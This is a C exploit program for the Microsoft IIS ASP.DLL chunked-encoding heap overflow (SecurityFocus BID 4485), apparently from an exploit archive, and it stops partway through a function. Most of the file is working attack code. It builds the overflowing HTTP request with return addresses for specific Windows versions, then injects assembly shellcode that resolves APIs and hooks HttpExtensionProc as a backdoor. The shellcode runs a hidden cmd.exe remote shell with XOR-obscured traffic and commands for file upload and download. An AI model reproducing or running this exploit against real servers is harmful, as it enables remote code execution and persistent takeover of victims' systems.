/*
source: https://www.securityfocus.com/bid/4485/info

A heap overflow condition in the 'chunked encoding transfer mechanism' related to Active Server Pages has been reported for Microsoft IIS (Internet Information Services).

This condition affects IIS 4.0 and IIS 5.0. Exploitation of this vulnerability may result in a denial of service or allow for a remote attacker to execute arbitrary instructions on the victim host.

Microsoft IIS 5.0 is reported to ship with a default script (iisstart.asp) which may be sufficient for a remote attacker to exploit. Other sample scripts may also be exploitable.

A number of Cisco products are affected by this vulnerability, although this issue is not present in the Cisco products themselves.
*/

/*
    aspcode.c  ver1.0
    iis4.0��iis5.0��iis5.1     asp.dll  overflow program
    copy by yuange <yuange@nsfocus.com>  2002.4.24
*/
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
#pragma  comment(lib,"ws2_32")
//#define  RETEIPADDR  eipwin2000
#define  FNENDLONG   0x08
#define  NOPCODE     0x90
#define  NOPLONG     0x50
#define  BUFFSIZE    0x20000
#define  PATHLONG    0x12
#define  RETEIPADDRESS 0x468
#define  SHELLBUFFSIZE 0x800
#define  SHELLFNNUMS   14
#define  DATABASE      0x61
#define  DATAXORCODE   0x55
#define  LOCKBIGNUM    19999999
#define  LOCKBIGNUM2   13579139
#define  MCBSIZE       0x8
#define  MEMSIZE       0xb200
#define  SHELLPORT   0x1f90   //0x1f90=8080
#define  WEBPORT     80
void     shellcodefnlock();
void     shellcodefnlock2();
void     shellcodefn(char *ecb);
void     shellcodefn2(char *ecb);
void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int
len);
void     iisput(int fd,char *str);
void     iisget(int fd,char *str);
void     iiscmd(int fd,char *str);
void     iisreset();
void     iisdie();
void     iishelp();
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
 int xordatabegin;
 int  lockintvar1,lockintvar2;
 char lockcharvar;
int main(int argc, char **argv)
{
 char *server;
 char *str="LoadLibraryA""\x0""CreatePipe""\x0"
      "CreateProcessA""\x0""CloseHandle""\x0"
      "PeekNamedPipe""\x0"
      "ReadFile""\x0""WriteFile""\x0"
      "CreateFileA""\x0"
      "GetFileSize""\x0"
      "GetLastError""\x0"
      "Sleep""\x0"
      "\x09""ntdll.dll""\x0""RtlEnterCriticalSection""\x0"
      "\x09""asp.dll""\x0""HttpExtensionProc""\x0"
      "\x09""msvcrt.dll""\x0""memcpy""\x0""\x0"
      "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
      "XORDATA""\x0""xordatareset""\x0"
      "strend";
//  char buff0[]="TRACK / HTTP/1.1\nHOST:";
 char buff1[]="GET /";
 char buff2[]="default.asp";
 char *buff2add;
 char buff3[]="?!!ko ";
 char buff4[]=" HTTP/1.1 \nHOST:";
 char buff5[]="\nContent-Type: application/x-www-form-urlencoded";
 char buff51[]="\nTransfer-Encoding:chunked";
 char buff6[]="\nContent-length: 2147506431\r\n\r\n";  //
0x80000000+MEMSIZE-1
 char buff61[]="\nContent-length: 4294967295\r\n\r\n";  // 0xffffffff
 char buff7[]=
"\x10\x00\x01\x02\x03\x04\x05\x06\x1c\xf0\xfd\x7f\x20\x21\x00\x01";
 char buff11[]=
"\x02\x00\x01\x02\x03\x04\x05\x06\x22\x22\x00\x01\x22\x22\x00\x01";
 char buff10[]="\x20\x21\x00\x01\x20\x21\x00\x01";
 char buff9[]= "\x20\x21\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30";
 char buff8[]= "\x81\xec\xff\xe4\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 /*
 char
buff10[]="\x10\x00\x01\x02\x03\x04\x05\x06\x1d\x21\x00\x01\xec\x21\x00\x01";
 char
buff11[]="\x10\x00\x01\x02\x03\x04\x05\x06\x20\x21\x00\x01\x01\x21\x00\x01";
 char
buff12[]="\x10\x00\x01\x02\x03\x04\x05\x06\x21\x21\x00\x01\x00\x21\x00\x01";
 char
buff13[]="\x10\x00\x01\x02\x03\x04\x05\x06\x22\x21\x00\x01\xff\x21\x00\x01";
 char
buff14[]="\x10\x00\x01\x02\x03\x04\x05\x06\x23\x21\x00\x01\xe4\x21\x00\x01";
 char
buff15[]="\x10\x00\x01\x02\x03\x04\x05\x06\x24\x21\x00\x01\x90\x21\x00\x01";
*/
 char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
 char SRLF[]="\x0d\x0a\x00\x00";

 char  *eipexceptwin2000add;
       char  eipexceptwin20002[]="\x80\x70\x9f\x74";   //  push ebx ;
ret  address
       char  eipexceptwin2000cn[]="\x73\x67\xfa\x7F";   //  push ebx ;
ret  address
       char  eipexceptwin2000[]="\x80\x70\x97\x74";
//     char  eipexceptwin2000[]="\xb3\x9d\xfa\x77";  // \x01\x78";
//  call ebx  address
       char  eipexceptwin2000msvcrt[]="\xD3\xCB\x01\x78";
       char  eipexceptwin2000sp2[]="\x02\xbc\x01\x78";
//     char  eipexceptwin2000[]="\x0B\x08\x5A\x68";
//  char  eipexceptwin2000[]="\x32\x8d\x9f\x74";
   char  eipexceptwinnt[]  ="\x82\x01\xfc\x7F";     //  push esi ;
ret  address
//     char  eipexceptwinnt[]  ="\x2e\x01\x01\x78";
//  call  esi  address
//  char  eipexcept2[]="\xd0\xae\xdc\x77";  //
 char    buff[BUFFSIZE];
 char    recvbuff[BUFFSIZE];
 char    shellcodebuff[BUFFSIZE];
 char    shellcodebuff2[BUFFSIZE];
 struct  sockaddr_in s_in2,s_in3;
 struct  hostent *he;
 char    *shellcodefnadd,*chkespadd;
 unsigned  int sendpacketlong,buff2long,shelladd,packlong;
 int i,j,k,l,strheadlong;
 unsigned  char temp;
 int     fd;
 u_short port,port1,shellcodeport;
 SOCKET  d_ip;
 WSADATA wsaData;
 int offset=0;
 int OVERADD=RETEIPADDRESS;
 int result;
 fprintf(stderr,"\n IIS ASP.DLL OVERFLOW PROGRAM 2.0 .");
 fprintf(stderr,"\n copy by yuange 2002.4.24.");
 fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net .");
 fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
 fprintf(stderr,"\n usage: %s <server> [aspfile] [webport] [winxp] \n",
argv[0]);
 buff2add=buff2;
 if(argc <2){
     fprintf(stderr,"\n please enter the web server:");
     gets(recvbuff);
     for(i=0;i<strlen(recvbuff);++i){
        if(recvbuff[i]!=' ') break;
     }
     server=recvbuff;
     if(i<strlen(recvbuff)) server+=i;
     fprintf(stderr,"\n please enter the .asp filename:");
     gets(shellcodebuff);
     for(i=0;i<strlen(shellcodebuff);++i){
         if(shellcodebuff[i]!=' ') break;
     }
     buff2add=shellcodebuff+i;
     printf("\n .asp file name:%s\n",buff2add);
 }
 eipexceptwin2000add=eipexceptwin2000;
// printf("\n argc%d argv%s",argc,argv[5]);
 if(argc>5){
     if(strcmp(argv[5],"cn")==0) {
         eipexceptwin2000add=eipexceptwin2000cn;
         printf("\n For the cn system.\n");
     }
     if(strcmp(argv[5],"sp0")==0) {
         eipexceptwin2000add=eipexceptwin20002;
         printf("\n For the sp0 system.\n");
     }
     if(strcmp(argv[5],"msvcrt")==0) {
         eipexceptwin2000add=eipexceptwin2000msvcrt;
         printf("\n Use msvcrt.dll JMP to shell.\n");
     }
     if(strcmp(argv[5],"sp2")==0) {
         eipexceptwin2000add=eipexceptwin2000sp2;
         printf("\n Use sp2 msvcrt.dll JMP to shell.\n");
     }
 }
 result= WSAStartup(MAKEWORD(1, 1), &wsaData);
 if (result != 0) {
       fprintf(stderr, "Your computer was not connected "
           "to the Internet at the time that "
           "this program was launched, or you "
           "do not have a 32-bit "
           "connection to the Internet.");
       exit(1);
   }
/*
 if(argc>4){
   offset=atoi(argv[4]);
 }
//  OVERADD+=offset;
//  packlong=0x10000-offset+0x8;
 if(offset<-0x20||offset>0x20){
    fprintf(stderr,"\n offset error !offset  -32 --- +32 .");
    gets(buff);
    exit(1);
 }
*/
 if(argc <2){
 //     WSACleanup( );
//       exit(1);
 }
 else  server = argv[1];
 for(i=0;i<strlen(server);++i){
    if(server[i]!=' ')
    break;
 }
 if(i<strlen(server)) server+=i;
 for(i=0;i+3<strlen(server);++i){

     if(server[i]==':'){
         if(server[i+1]=='\\'||server[i+1]=='/'){
             if(server[i+2]=='\\'||server[i+2]=='/'){
                 server+=i;
                 server+=3;
                 break;
             }
         }
     }
 }
 for(i=1;i<=strlen(server);++i){
     if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
 }
 d_ip = inet_addr(server);
 if(d_ip==-1){
    he = gethostbyname(server);
    if(!he)
    {
      WSACleanup( );
      printf("\n Can't get the ip of %s !\n",server);
      gets(buff);
      exit(1);
    }
    else    memcpy(&d_ip, he->h_addr, 4);
 }

 if(argc>3) port=atoi(argv[3]);
 else   port=WEBPORT;
 if(port==0) port=WEBPORT;
 fd = socket(AF_INET, SOCK_STREAM,0);
 i=8000;
 setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));

 s_in3.sin_family = AF_INET;
 s_in3.sin_port = htons(port);
 s_in3.sin_addr.s_addr = d_ip;
 printf("\n nuke ip: %s port
%d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));

if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct
sockaddr_in))!=0)
{
    closesocket(fd);
    WSACleanup( );
    fprintf(stderr,"\n  connect err.");
    gets(buff);
    exit(1);
}

 _asm{
        mov ESI,ESP
        cmp ESI,ESP
 }
 _chkesp();
 chkespadd=_chkesp;
 temp=*chkespadd;
 if(temp==0xe9) {
        ++chkespadd;
        i=*(int*)chkespadd;
        chkespadd+=i;
        chkespadd+=4;
 }
 /*
 shellcodefnadd=shellcodefnlock;
 temp=*shellcodefnadd;
 if(temp==0xe9) {
        ++shellcodefnadd;
        k=*(int *)shellcodefnadd;
        shellcodefnadd+=k;
        shellcodefnadd+=4;
 }
 for(k=0;k<=0x500;++k){
        if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 }
*/
 memset(buff,NOPCODE,BUFFSIZE);
 /*
 strcpy(buff,buff0);
 if(argc>6) strcat(buff,argv[6]);
 else  strcat(buff,server);
 strcat(buff,"\r\n\r\n"); //Proxy_Connection: Keep-Alive\r\n");

 strcat(buff,buff1);
*/
 strcpy(buff,buff1);
 strheadlong=strlen(buff);
 OVERADD+=strheadlong-1;

if(argc>2) buff2add=argv[2];
for(;;++buff2add){
    temp=*buff2add;
    if(temp!='\\'&&temp!='/') break;
}
// printf("\nfile:%s",buff2add);
buff2long=strlen(buff2add);
strcat(buff,buff2add);
// fprintf(stderr,"\n offset:%d\n",offset);
// offset+=strheadlong-strlen(buff1);

/*
for(i=0x404;i<=0x500;i+=8){
  memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
  memcpy(buff+offset+i+4,eipexceptwin2000add,4);
 }
if(argc>5){
   if(strcmp(argv[5],"sp2")==0) {
     memcpy(buff+offset+i,"\x58",1);
   }
}
for(i=0x220;i<=0x380;i+=8){
  memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
  memcpy(buff+offset+i+4,eipexceptwinnt,4);
 }
for(i=0x580;i<=0x728;i+=8){
  memcpy(buff+offset+i,"\x42\x42\x42\x2d",4);  //  0x2d  sub eax,num32
  memcpy(buff+offset+i+4,eipexceptwinnt,4);
 }
*/
// winnt 0x2cc or 0x71c  win2000 0x130 or 0x468
//  memcpy(buff+offset+i+8,exceptret,strlen(exceptret));
shellcodefnadd=shellcodefnlock;
 temp=*shellcodefnadd;
 if(temp==0xe9) {
        ++shellcodefnadd;
        k=*(int *)shellcodefnadd;
        shellcodefnadd+=k;
        shellcodefnadd+=4;
 }
for(k=0;k<=0x500;++k){
        if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 }
 memset(shellcodebuff2,NOPCODE,BUFFSIZE);
 i=0x1000;
 memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100);

 shellcodefnadd=shellcodefn;
 temp=*shellcodefnadd;
 if(temp==0xe9) {
         ++shellcodefnadd;
        k=*(int *)shellcodefnadd;
        shellcodefnadd+=k;
        shellcodefnadd+=4;
 }

 for(k=0;k<=BUFFSIZE;++k){
        if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 }
//  k+=0x
 memcpy(shellcodebuff,shellcodefnadd,k);   //j);
 cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
 for(j=0;j<0x400;++j){
     if(memcmp(str+j,"strend",6)==0) break;
 }
 memcpy(shellcodebuff+k,str,j);
 sendpacketlong=k+j;
 for(k=0;k<=0x200;++k){
        if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break;
 }
for(j=0;j<sendpacketlong;++j){
        temp=shellcodebuff[j];
//         temp^=DATAXORCODE;
        shellcodebuff2[i+4+k]=DATABASE+temp/0x10;
        ++k;
        shellcodebuff2[i+4+k]=DATABASE+temp%0x10;
        ++k;
}
j=i+k;
j=j%8+3;
shellcodebuff2[i+j+k]=0;
// j=strlen(shellcodebuff2)%8+3;
for(j=0;j<=0xe000;j+=4){
  strcat(shellcodebuff2,"\x41\x41\x41\x41");  //  0x2d  sub eax,num32
//   strcat(shellcodebuff2,eipexceptwin2000cn);
 }
/*
strcat(shellcodebuff2,"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x0f\x66\x83\
x6c\x24\x02\x01\x66\x81\x2c\x24\x01\x01\xff\x24\x24\xe8\xec\xff\xff\xff\
x90");
for(j=0;j<=0xb00;j+=4){
  strcat(shellcodebuff2,"\x90\x90\x90\x2d");  //  0x2d  sub eax,num32
}
*/
// printf("\nbuff:%s",buff);
printf("\n shellcode long 0x%x\n",sendpacketlong);
if(argc>4&&strcmp(argv[4],"apache")==0){
      strcat(buff," ");
}
else  strcat(buff,buff3);
printf("\n packetlong:0x%x\n",sendpacketlong);
strcat(buff,buff4);
if(argc>6) strcat(buff,argv[6]);
else  strcat(buff,server);
strcat(buff,buff5);
if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," ");
else  strcat(buff,shellcodebuff2);
// strcat(buff,buff51);
if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) {
    printf("\n for %s system\n",argv[4]);
    strcat(buff,buff61);
}
else strcat(buff,buff6);
// printf("\n send buff:\n%s",buff);
/*
i=strlen(buff);
memset(buff+i,'a',0xc000);
memset(buff+i+0xc000-strlen(buff7),0,1);
strcat(buff+i+0xc000-0x10-strlen(buff7),buff7);
*/
// strcpy(buff8,buff7);
/* temp=buff7[5];
temp-=offset*0x10;
buff7[5]=temp;
i=*(int *)(buff7+4)+2;
printf("\nSEH=0x%x\n",i);
*/
/*
for(i=0;i<8;++i){
 temp=buff7[i];
 printf("%2x",temp);
}
*/
/*
for(i=0;i<0xc000/0x10;++i){
  strcat(buff,buff7);
}
*/
// printf("\nbuff=%s\n",buff);
// strcat(buff,"\r\n");
// printf("\n send buff:\n%s",buff);
//  strcpy(buff+OVERADD+NOPLONG,shellcode);
 sendpacketlong=strlen(buff);
//  printf("buff:\n%s",buff+0x10000);
/*
#ifdef DEBUG
 _asm{
     lea esp,buff
       add esp,OVERADD
     ret
 }
#endif
*/
 lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
 lockintvar2=lockintvar1;
 xordatabegin=0;
 for(i=0;i<1;++i){
    j=sendpacketlong;
//     buff[0x2000]=0;
    fprintf(stderr,"\n send  packet %d bytes.",j);
//     gets(buff);
    send(fd,buff,j,0);
    buff7[0]=MCBSIZE;

    j=MEMSIZE+0x10;
    i=0;
    if(argc>4&&strcmp(argv[4],"winxp")==0)
    {
          j=0x18;
        i=8;
    }
    for(k=0;i<0xc000;i+=0x10){
        if(i>=j) {

              k=((i-j)/(MCBSIZE*8));
              if(k<=6){
                  memcpy(buff7+0x8,buff10,8);
                  buff7[0x8]=buff8[k];
                  buff7[0xc]=buff9[k];
              }
              else memcpy(buff7,buff11,0x10);
        }
        memcpy(buff+i,buff7,0x10);

    }
    if(argc>4&&strcmp(argv[4],"apache")==0){
        for(k=0xb000;k<=0xc000;k+=2)
        {
            memset(buff+k,0x0d,1);
            memset(buff+k+1,0x0a,1);
        }
        buff[0xc000]=0;
   //     for(k=0;k<0x10;++k)      send(fd,buff,0xc000,0);
   //     printf("\nbuff:%s\n",buff);
    }
    else send(fd,buff,0xc000,0);

     k=0;
     ioctlsocket(fd, FIONBIO, &k);
    j=0;
    while(j==0){
        k=newrecv(fd,recvbuff,BUFFSIZE,0);
        if(k>=8&&strstr(recvbuff,"XORDATA")!=0) {
           xordatabegin=1;
           fprintf(stderr,"\n ok!recv %d bytes\n",k);
           recvbuff[k]=0;
//            printf("\n recv:%s",recvbuff);
//            for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x\n",*(int
*)(recvbuff+8+4*j));
           k=-1;
           j=1;
        }
        if(k>0){
            recvbuff[k]=0;
           fprintf(stderr,"\n  recv:\n %s",recvbuff);
        }
    }
 }
 k=1;
 ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
/*
 for(i=0;i<strlen(SRLF);++i){
         SRLF[i]^=DATAXORCODE;
 }
 send(fd,SRLF,strlen(SRLF),0);
 send(fd,SRLF,strlen(SRLF),0);
 send(fd,SRLF,strlen(SRLF),0);
*/
 k=1;
 l=0;
 while(k!=0){
     if(k<0){
         l=0;
         i=0;
         while(i==0){
             gets(buff);
             if(memcmp(buff,"iish",4)==0){
                      iishelp();
                    i=2;
             }
             if(memcmp(buff,"iisput",6)==0){
                      iisput(fd,buff+6);
                    i=2;
             }
             if(memcmp(buff,"iisget",6)==0){
                      iisget(fd,buff+6);
                    i=2;
             }
             if(memcmp(buff,"iiscmd",6)==0){
                    iiscmd(fd,buff+6);
                    i=2;
             }
             if(memcmp(buff,"iisreset",8)==0){
                    iisreset(fd,buff+6);
                    i=2;
             }
             if(memcmp(buff,"iisdie",6)==0){
                    iisdie(fd,buff+6);
                    i=2;
             }
             if(i==2)i=0;
             else i=1;
         }

         k=strlen(buff);

         memcpy(buff+k,SRLF,3);
   //      send(fd,SRLF,strlen(SRLF),0);
   //      fprintf(stderr,"%s",buff);
/*
         for(i=0;i<k+2;++i){
               lockintvar2=lockintvar2*0x100;
               lockintvar2=lockintvar2%LOCKBIGNUM;
               lockcharvar=lockintvar2%0x100;
               buff[i]^=lockcharvar;   // DATAXORCODE;
//              buff[i]^=DATAXORCODE;
         }
            send(fd,buff,k+2,0);
*/
         newsend(fd,buff,k+2,0);
//          send(fd,SRLF,strlen(SRLF),0);
     }
     k=newrecv(fd,buff,BUFFSIZE,0);
     if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) {
         xordatabegin=1;
         k=-1;
     }
     if(k>0){
//          fprintf(stderr,"recv %d bytes",k);
/*
         if(xordatabegin==1){
             for(i=0;i<k;++i){
               lockintvar1=lockintvar1*0x100;
               lockintvar1=lockintvar1%LOCKBIGNUM;
               lockcharvar=lockintvar1%0x100;
               buff[i]^=lockcharvar;   // DATAXORCODE;
             }
         }
*/
         l=0;
         buff[k]=0;
         fprintf(stderr,"%s",buff);
     }
     else{
         Sleep(20);
         if(l<20) k=1;
         ++l;

     }
//      if(k==0) break;
 }
 closesocket(fd);
 WSACleanup( );
 fprintf(stderr,"\n the server close connect.");
 gets(buff);
 return(0);
}
void  shellcodefnlock()
{
      _asm{
             nop
             nop
             nop
             nop
             nop
             nop
             nop
             nop

             jmp   next1
getediadd:      pop   edi
                mov   esp,edi
             and   esp,0xfffff0f0
             jmp   next2
getshelladd:
             push  0x01
             mov   eax,edi
             inc   eax
             inc   eax
             inc   eax
             inc   eax
             inc   eax
             mov   edi,eax
             mov   esi,edi
   //          sub   sp,8
             xor   ecx,ecx
looplock:     lodsb
             cmp  al,cl
             jz   shell
             sub  al,DATABASE
             mov  ah,al
             lodsb
             sub  al,DATABASE
             shl  ah,4
             add  al,ah
   //          lea  eax,ptr word [edx*4+al]
             stosb
             jmp looplock
next1:        call  getediadd
next2:        call  getshelladd
shell:
             NOP
             NOP
             NOP
             NOP
             NOP
             NOP
             NOP
             NOP


   }
}
void shellcodefn(char *ecb)
{    char        Buff[SHELLBUFFSIZE+2];
   int         *except[3];
   FARPROC     memcpyadd;
   FARPROC     msvcrtdlladd;
   FARPROC     HttpExtensionProcadd;
   FARPROC     Aspdlladd;

   FARPROC     RtlEnterCriticalSectionadd;
   FARPROC     Ntdlladd;
   FARPROC     Sleepadd;
   FARPROC     GetLastErroradd;
   FARPROC     GetFileSizeadd;
   FARPROC     CreateFileAadd;
   FARPROC     WriteFileadd;
   FARPROC     ReadFileadd;
   FARPROC     PeekNamedPipeadd;
   FARPROC     CloseHandleadd;
   FARPROC     CreateProcessadd;
   FARPROC     CreatePipeadd;
   FARPROC        procloadlib;
   FARPROC     apifnadd[1];
   FARPROC     procgetadd=0;
   FARPROC     writeclient;
   FARPROC     readclient;
      HCONN       ConnID;
   FARPROC     shellcodefnadd=ecb;
   char        *stradd,*stradd2,*dooradd;
   int         imgbase,fnbase,i,k,l,thedoor;
   HANDLE      libhandle;
   int         fpt;   //libwsock32;
   STARTUPINFO siinfo;
   PROCESS_INFORMATION ProcessInformation;
   HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
   int         lBytesRead;
   int  lockintvar1,lockintvar2;
   char lockcharvar;
   int  shelllocknum;
//    unsigned char temp;
   SECURITY_ATTRIBUTES sa;

   _asm {            jmp    nextcall
        getstradd:   pop    stradd
                     lea    EDI,except
                     mov    eax,dword ptr FS:[0]
                     mov    dword ptr [edi+0x08],eax
                     mov    dword ptr FS:[0],EDI
   }
      except[0]=0xffffffff;
      except[1]=stradd-0x07;
      imgbase=0x77e00000;
      _asm{
         call getexceptretadd
      }
      for(;imgbase<0xbffa0000,procgetadd==0;){
           imgbase+=0x10000;
           if(imgbase==0x78000000) imgbase=0xbff00000;
           if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int
*)(imgbase+0x3c))=='EP'){
                  fnbase=*(int *)(imgbase+*(int
*)(imgbase+0x3c)+0x78)+imgbase;
                  k=*(int *)(fnbase+0xc)+imgbase;
                  if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
                     libhandle=imgbase;
                     k=imgbase+*(int *)(fnbase+0x20);
                     for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
                       if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int
*)(4+imgbase+*(int *)k)=='Acor')
                       {
                          k=*(WORD *)(l+l+imgbase+*(int
*)(fnbase+0x24));
                          k+=*(int *)(fnbase+0x10)-1;
                          k=*(int *)(k+k+k+k+imgbase+*(int
*)(fnbase+0x1c));
                          procgetadd=k+imgbase;
                          break;
                       }
                     }
                  }
           }
         }
//����KERNEL32��DLLģ���ַ��API���� GetProcAddress��ַ
//ע�������������ҳ�治�����
   if(procgetadd==0) goto  die ;
   i=stradd;
          for(k=1;*stradd!=0;++k) {
               if(*stradd==0x9) libhandle=procloadlib(stradd+1);
               else     apifnadd[k]=procgetadd(libhandle,stradd);
               for(;*stradd!=0;++stradd){
               }
               ++stradd;
          }
          ++stradd;
          k=0x7ffdf020;
          *(int *)k=RtlEnterCriticalSectionadd;
   k=stradd;
   stradd=i;
   thedoor=0;
   i=0;
   _asm{
                  jmp  getdoorcall
getdooradd:     pop  dooradd;
               mov  l,esp
               call getexceptretadd
   }
   if(i==0){
       ++i;
       if(*(int *)ecb==0x90){
           if(*(int *)(*(int *)(ecb+0x64))=='ok!!') {
               i=0;
               thedoor=1;
           }
       }
   }
   if(i!=0){
      *(int *)(dooradd-0x0c)=HttpExtensionProcadd;
      *(int *)(dooradd-0x13)=shellcodefnadd;
     ecb=0;
     _asm{
         call getexceptretadd
     }
     i=ecb;
     i&=0xfffff000;
     ecb=i;
     ecb+=0x1000;
     for(;i<l;++i,++ecb)
     {
           if(*(int *)ecb==0x90){
               if(*(int *)(ecb+8)==(int *)ecb){
                   if(*(int *)*(int *)(ecb+0x64)=='ok!!')    break;
               }
           }
     }
     i=0;
     _asm{
         call getexceptretadd
     }
     i&=0xfffff000;
     i+=0x1000;
     for(;i<l;++i){
         if(*(int *)i==HttpExtensionProcadd){
           *(int *)i=dooradd-7;
          //    break;
        }
     }
 //    *(int *)(dooradd-0x0c)=HttpExtensionProcadd;

   }
   writeclient= *(int *)(ecb+0x84);
   readclient = *(int *)(ecb+0x88);
   ConnID     = *(int *)(ecb+8) ;
   stradd=k;
      _asm{
          lea edi,except
          mov eax,dword ptr [edi+0x08]
          mov dword ptr fs:[0],eax
      }
      if(thedoor==0){
          _asm{
               mov eax,0xffffffff
               mov dword ptr fs:[0],eax
          }
      }
           stradd2=stradd;
           stradd+=8;
           k=0x20;
           writeclient(ConnID,*(int *)(ecb+0x6c),&k,0);
           k=8;
           writeclient(ConnID,stradd+9,&k,0);
//            Sleepadd(100);

           shelllocknum=LOCKBIGNUM2;
           if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int
*)(ecb+0x64)+4)=='notx') shelllocknum=0;

// iiscmd:
           lockintvar1=shelllocknum%LOCKBIGNUM;
           lockintvar2=lockintvar1;
iiscmd:
/*
           lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
           lockintvar2=lockintvar1;
*/
           sa.nLength=12;
           sa.lpSecurityDescriptor=0;
           sa.bInheritHandle=TRUE;
           CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
           CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);
// ZeroMemory(&siinfo,sizeof(siinfo));
           _asm{
               lea EDI,siinfo
               xor eax,eax
               mov ecx,0x11
               repnz stosd
           }
   siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
   siinfo.wShowWindow = SW_HIDE;
   siinfo.hStdInput = hReadPipe2;
   siinfo.hStdOutput=hWritePipe1;
   siinfo.hStdError =hWritePipe1;
   k=0;
//    while(k==0)
//   {
       k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo,
&ProcessInformation);
//        stradd+=8;
//    }
       Sleepadd(200);
//        PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0
);


   i=0;
   while(1) {
       PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
       if(lBytesRead>0) {
          i=0;
          ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
          if(lBytesRead>0) {
              for(k=0;k<lBytesRead;++k){
               lockintvar2=lockintvar2*0x100;
               lockintvar2=lockintvar2%LOCKBIGNUM;
               lockcharvar=lockintvar2%0x100;
               Buff[k]^=lockcharvar;   // DATAXORCODE;
//                Buff[k]^=DATAXORCODE;
              }
              writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC);
//               Sleepadd(20);
          }
       }
       else{
//                 Sleepadd(10);
            l=0;
            if(i<50){
                l=1;
                ++i;
                k=1;
                lBytesRead=0;
            }



             while(l==0){
                i=0;
                lBytesRead=SHELLBUFFSIZE;
                k=readclient(ConnID,Buff,&lBytesRead);
                 for(l=0;l<lBytesRead;++l){
                        lockintvar1=lockintvar1*0x100;
                        lockintvar1=lockintvar1%LOCKBIGNUM;
                        lockcharvar=lockintvar1%0x100;
                        Buff[l]^=lockcharvar;   // DATAXORCODE;
                 }

                 if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu
ff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){
                     k=8;
                     WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
cmd.exe
                     WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
cmd.exe
                     stradd2=Buff+5;
                     Buff[lBytesRead]=0;
                     goto iiscmd;
                 }
                 if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Bu
ff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){


                       lBytesRead=0x0c;
                       writeclient(ConnID,stradd+0x11,&lBytesRead,0);
                          lockintvar1=shelllocknum%LOCKBIGNUM;
                       lockintvar2=lockintvar1;
                       lBytesRead=0;
                 }
                 if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu
ff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){
                     k=8;
                     WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
cmd.exe
                     WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit
cmd.exe
                     *(int *)(dooradd-0x0c)=0;
                     Sleepadd(0x7fffffff);
                     _asm{
                         mov eax,0
                         mov esp,0
                         jmp eax
                     }
                 }


if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3]
==' ')
                {
                   l=*(int *)(Buff+4);
   //
WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL);
                   fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+
GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0
);
                   k=GetLastErroradd();
                   i=0;
                   while(l>0){
                      lBytesRead=SHELLBUFFSIZE;
                      k=readclient(ConnID,Buff,&lBytesRead);
                      if(k==1){
                          if(lBytesRead>0){
                              for(k=0;k<lBytesRead;++k){
                                    lockintvar1=lockintvar1*0x100;
                                    lockintvar1=lockintvar1%LOCKBIGNUM;
                                    lockcharvar=lockintvar1%0x100;
                                    Buff[k]^=lockcharvar;   //
DATAXORCODE;
                              }

